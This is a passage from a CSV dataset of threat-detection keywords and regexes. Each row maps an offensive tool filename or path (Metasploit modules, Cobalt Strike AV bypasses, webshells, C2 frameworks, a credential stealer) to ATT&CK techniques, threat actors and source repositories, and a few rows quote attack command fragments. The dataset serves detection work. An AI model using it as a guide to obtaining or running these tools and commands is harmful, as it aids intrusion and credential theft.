Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5862"
"*/BX RAT V*.exe*",".{0,1000}\/BX\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5863"
"*/BX RAT.exe*",".{0,1000}\/BX\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5864"
"*/byakugan.cpp*",".{0,1000}\/byakugan\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5865"
"*/byakugan.dll*",".{0,1000}\/byakugan\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5866"
"*/bypass.vbs*",".{0,1000}\/bypass\.vbs.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5867"
"*/Bypass/payloads*",".{0,1000}\/Bypass\/payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","5868"
"*/bypass_mod/loader*",".{0,1000}\/bypass_mod\/loader.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","5869"
"*/BypassAddUser.exe*",".{0,1000}\/BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5870"
"*/BypassAddUser.exe*",".{0,1000}\/BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5871"
"*/BypassAddUser.git*",".{0,1000}\/BypassAddUser\.git.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5872"
"*/BypassAddUser/releases/download/*",".{0,1000}\/BypassAddUser\/releases\/download\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5873"
"*/BypassAddUser/tarball/*",".{0,1000}\/BypassAddUser\/tarball\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5874"
"*/BypassAddUser/zipball/*",".{0,1000}\/BypassAddUser\/zipball\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5875"
"*/BypassAV/*",".{0,1000}\/BypassAV\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","N/A","10","10","908","125","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z","5876"
"*/bypassAV-1/*",".{0,1000}\/bypassAV\-1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","5877"
"*/bypass-clm.exe*",".{0,1000}\/bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","5878"
"*/bypass-clm.git*",".{0,1000}\/bypass\-clm\.git.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","5879"
"*/BypassCredGuard.cpp*",".{0,1000}\/BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5880"
"*/BypassCredGuard.exe*",".{0,1000}\/BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5881"
"*/BypassCredGuard.git*",".{0,1000}\/BypassCredGuard\.git.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5882"
"*/BypassFramework.py*",".{0,1000}\/BypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","5883"
"*/bypass-iisuser-p.asp*",".{0,1000}\/bypass\-iisuser\-p\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5884"
"*/bypassuac/*",".{0,1000}\/bypassuac\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5885"
"*/bypass-waf.asp*",".{0,1000}\/bypass\-waf\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5886"
"*/bypass-with-base32.php*",".{0,1000}\/bypass\-with\-base32\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5887"
"*/c lol fuck this*",".{0,1000}\/c\slol\sfuck\sthis.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","5888"
"*/c net group *Domain Admins* /domain >> output.txt*",".{0,1000}\/c\snet\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain\s\>\>\soutput\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5889"
"*/c ping 127.0.0.1 && del \\*",".{0,1000}\/c\sping\s127\.0\.0\.1\s\&\&\sdel\s\\\\.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","5890"
"*/C2/Beacon/*.cs*",".{0,1000}\/C2\/Beacon\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","5891"
"*/c2/c2.go*",".{0,1000}\/c2\/c2\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5892"
"*/C2/c2.go*",".{0,1000}\/C2\/c2\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","5893"
"*/C2/Http/*.cs*",".{0,1000}\/C2\/Http\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5894"
"*/C2/server.py*",".{0,1000}\/C2\/server\.py.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","5895"
"*/C2/SmbListener.*",".{0,1000}\/C2\/SmbListener\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5896"
"*/c2/tcp-stager.*",".{0,1000}\/c2\/tcp\-stager\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5897"
"*/c2_access.log*",".{0,1000}\/c2_access\.log.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#linux","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","5898"
"*/c2_code/*.html",".{0,1000}\/c2_code\/.{0,1000}\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","5899"
"*/c2_code/server*",".{0,1000}\/c2_code\/server.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","5900"
"*/C2_Profiles/*",".{0,1000}\/C2_Profiles\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5901"
"*/C2_Server.git*",".{0,1000}\/C2_Server\.git.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","5902"
"*/c2_server.py*",".{0,1000}\/c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","5903"
"*/c2_server/resources*",".{0,1000}\/c2_server\/resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5904"
"*/c2_test.go*",".{0,1000}\/c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5905"
"*/c2-3.4.0.zip*",".{0,1000}\/c2\-3\.4\.0\.zip.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5906"
"*/c2-3.4.0_amd64_darwin*",".{0,1000}\/c2\-3\.4\.0_amd64_darwin.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","5907"
"*/c2-3.4.0_amd64_windows.exe*",".{0,1000}\/c2\-3\.4\.0_amd64_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5908"
"*/c2-3.4.0_arm64_darwin*",".{0,1000}\/c2\-3\.4\.0_arm64_darwin.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","#linux","N/A","10","9","N/A","N/A","N/A","N/A","5909"
"*/c2-3.4.0_i386_windows.exe*",".{0,1000}\/c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5910"
"*/c2-3.4.0_i386_windows.exe*",".{0,1000}\/c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5911"
